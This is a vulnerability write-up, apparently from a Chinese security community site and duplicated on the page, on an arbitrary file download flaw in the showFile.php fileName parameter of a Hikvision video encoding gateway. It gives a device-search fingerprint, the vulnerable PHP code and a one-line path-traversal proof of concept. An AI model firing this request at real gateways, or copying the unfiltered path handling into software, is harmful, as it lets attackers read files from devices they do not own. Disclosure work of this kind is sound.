HIKVISION 视频编码设备接入网关 showFile.php 任意文件下载漏洞

# HIKVISION 视频编码设备接入网关 showFile.php 任意文件下载漏洞 ## 漏洞描述 Hikvision视频接入网关系统在页面`/serverLog/showFile.php`的参数fileName存在任意文件下载漏洞 ## 漏...

HIKVISION 视频编码设备接入网关 showFile.php 任意文件下载漏洞
==========================================

漏洞描述
----

Hikvision视频接入网关系统在页面`/serverLog/showFile.php`的参数fileName存在任意文件下载漏洞

漏洞影响
----

HIKVISION 视频编码设备接入网关

网络测绘
----

title="视频编码设备接入网关"

漏洞复现
----

登录页面

![img](https://oss-yg-cztt.yun.qianxin.com/butian-public/f648073176b25efd16f2525a19a1789ed1a1125431063.jpg)

漏洞文件为 `showFile.php`, 其中 `参数 fileName` 没有过滤危险字符，导致可文件遍历下载

```php
<?php
                    $file_name = $_GET['fileName'];
                    $file_path = '../../../log/'.$file_name;
                    $fp = fopen($file_path, "r");
                    while($line = fgets($fp)){
                        $line = nl2br(htmlentities($line, ENT_COMPAT, "utf-8"));
                        echo '<span style="font-size:16px">'.$line.'</span>';
                    }
                    fclose($fp);
?>
```

验证POC

```python
/serverLog/showFile.php?fileName=../web/html/main.php
```

![img](https://oss-yg-cztt.yun.qianxin.com/butian-public/f47813289afc52ae7d9932d896d695c03c56b24f870c5.jpg)

HIKVISION 视频编码设备接入网关 showFile.php 任意文件下载漏洞

漏洞描述

Hikvision视频接入网关系统在页面/serverLog/showFile.php的参数fileName存在任意文件下载漏洞

漏洞影响

HIKVISION 视频编码设备接入网关

网络测绘

title="视频编码设备接入网关"

漏洞复现

登录页面

漏洞文件为 showFile.php, 其中 参数 fileName 没有过滤危险字符，导致可文件遍历下载

<?php
                    $file_name = $_GET['fileName'];
                    $file_path = '../../../log/'.$file_name;
                    $fp = fopen($file_path, "r");
                    while($line = fgets($fp)){
                        $line = nl2br(htmlentities($line, ENT_COMPAT, "utf-8"));
                        echo '<span style="font-size:16px">'.$line.'</span>';
                    }
                    fclose($fp);
?>

验证POC

/serverLog/showFile.php?fileName=../web/html/main.php

发表于 2024-07-12 18:49:34
阅读 ( 2439 )
分类：网络设备

站长统计